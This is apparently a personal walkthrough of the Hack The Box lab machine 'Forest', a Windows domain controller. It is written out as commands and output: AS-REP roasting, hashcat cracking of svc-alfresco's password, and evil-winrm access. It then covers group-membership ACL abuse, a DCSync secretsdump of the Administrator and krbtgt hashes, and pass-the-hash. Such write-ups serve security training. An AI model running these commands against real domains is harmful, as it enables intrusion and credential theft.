Forest
Personal Rating: Medium
This box was rather easy at first as I just recently completed the HTBA Attacking AD and Windows privilege escalation modules. However, the ACL abuse to Domain Admin was tedious and hard to get to work.
Enumeration
Running an nmap scan:
sudo nmap -p- -sV -sC <IP>
Note that this scan is extensive and not stealthy, which might not be feasible in a real pentesting engagement.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-23 12:33:23Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49684/tcp open msrpc Microsoft Windows RPC
49706/tcp open msrpc Microsoft Windows RPC
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
This looks like a DC from the open ports. There is no webserver.
SMB Null Authentication
Null Authentication seems to work:
poetry run crackmapexec smb 10.10.10.161 -u '' -p ''
SMB 10.10.10.161 445 FOREST [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB 10.10.10.161 445 FOREST [+] htb.local\:
But I could not enumerate shares with this method.
LDAP Enumeration
Running a scan against ldap was successful:
sudo nmap -n -sV --script "ldap* and not brute" 10.10.10.161 > nmap-ldap.txt
The lockout threshold is 0, so running bruteforces against users would be viable.
I could enumerate some groups, but that is not interesting at the moment.
Using windapsearch I could fetch more information:
python3 windapsearch.py --dc-ip 10.10.10.161 -l "DC=htb,DC=local" > ldapinfo-windapsearch.txt
The resulting file was massive with nearly 8000 lines.
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.161
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Using DN: DC=htb,DC=local
<SNIP>
I could enumerate the users and groups though:
python3 /home/user/Documents/windapsearch/windapsearch.py --dc-ip 10.10.10.161 -l "DC=htb,DC=local" -U | grep sAMAccountName
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: Users
sAMAccountName: Guests
sAMAccountName: Remote Desktop Users
<SNIP>
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
sAMAccountName: test
Before I try a password brute or spray, I want to try to enumerate for Kerberoasting and AS-REPRoasting.
I did not find kerberoastable users with GetUserSPNs.py.
AS-REP Roasting
An AS-REPRoast did work with GetNPUsers.py -dc-ip 10.10.10.161 -request htb.local/
$krb5asrep$23$svc-alfresco@HTB.LOCAL:8a0ea34bea471b1532011ad9ed356eb0$434e5a983d1a2547c41eb1bee9b293b3d14ae7721c818e88e86fce349326e9c059433f821b6b16903c98a7075d035e6a64b3ad3baeef73282357f45d34c833ffd1a376a323e9f67ce3929727983f31a918632406648d91d9edbe7061e6ab42c4c0b3f58b4af1fd15b5c0fbfafca0d6bb1e00fcd9293fac9645d6e53109c3df2618e2aaa082bf294092ccbc3af41c0ea6a62b500423b0e875da6ce1930f35f467593761121ca55aecc113e483d5b46ae39b8c17ad5318d0a87ea2472f6bfed5bdc70d4a298af97337aa89c7966d12fdf50d30b4a8e71562068224726fdad5f9a4a9e88096989e
With
hashcat -a 0 -m 18200 <SNIP> rockyou.txt
I could crack the password for the user svc-alfresco:s3rviceWith these creds I could access the host with
evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice
AMSI bypassing, which evil-winrm has an integrated module for, was not required here.
Bloodhound Investigations
Now, since this is a DC and I can authenticate with a domain user, Bloodhound came to mind. The goal is to compromise the Administrator on the local machine, but in this case, this can be accomplished by gaining domain admin privileges. I like to run the SharpHound collector when there is no antivirus blocking it. Otherwise you might use the Powershell version and take further steps to evade AV with Powershell, like an AMSI bypass, heavy obfuscation, stealth options when running it etc.
I exfiltrated the collected zip file using smbserver.py on my machine and 'net use' on the target.
Checking Bloodhound, this path is the first one I looked into:

This can not be abused right now as I would need system privileges on the host to use mimikatz for example. But this one works unprivileged:

'svc-alfresco' is an indirect member of 'ACCOUNT OPERATORS'. We have to set ourselves as a member of "EXCHANGE WINDOWS PERMISSIONS" and then abuse WriteDacl to the domain.
ACL Abuse Path
I could add svc-alfresco to the target group with:
Add-ADGroupMember -Identity "EXCHANGE WINDOWS PERMISSIONS" -Members svc-alfresco
The easier versions of the group adding is this:
net user john password123 /add /domain
net group “Exchange Windows Permissions” john /add
The Powershell version, possibly with a Powershell downgrade attack or encoded after an AMSI bypass, would usually be the preferred way here for stealth.
I tried abusing the ACLs for hours, but could not find a solution. This was it in the end, after adding the user john to the Exchange group:
python3 DCSync.py -t 'CN=john,CN=Users,DC=htb,DC=local' -dc forest.htb.local htb.local\\john:password
python3 secretsdump.py htb.local/john:password@forest.htb.local
I did not know the script DCSync.py and the other scripts I tried did not work. I also tried to do it LoL-style with pure Powershell, but that failed too. The above command yielded what I wanted though:
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
Pass the Hash
With evil-winrm and pass-the-hash (-H) I could then access the machine as Admin.
evil-winrm -u Administrator -i <IP> -H '32693b11e6aa90eb43d32c72a07ceea6'
NOTE: The latter part of the NTLM hash is the NT part, which is used for authentication. The former hash is the LM part and is the same for all accounts because it is the default hash for deactivated LM authetication.
Since this machine is a DC, you could now use the krbtgt hash for the 'golden ticket' technique to obtain further persistence.
Last updated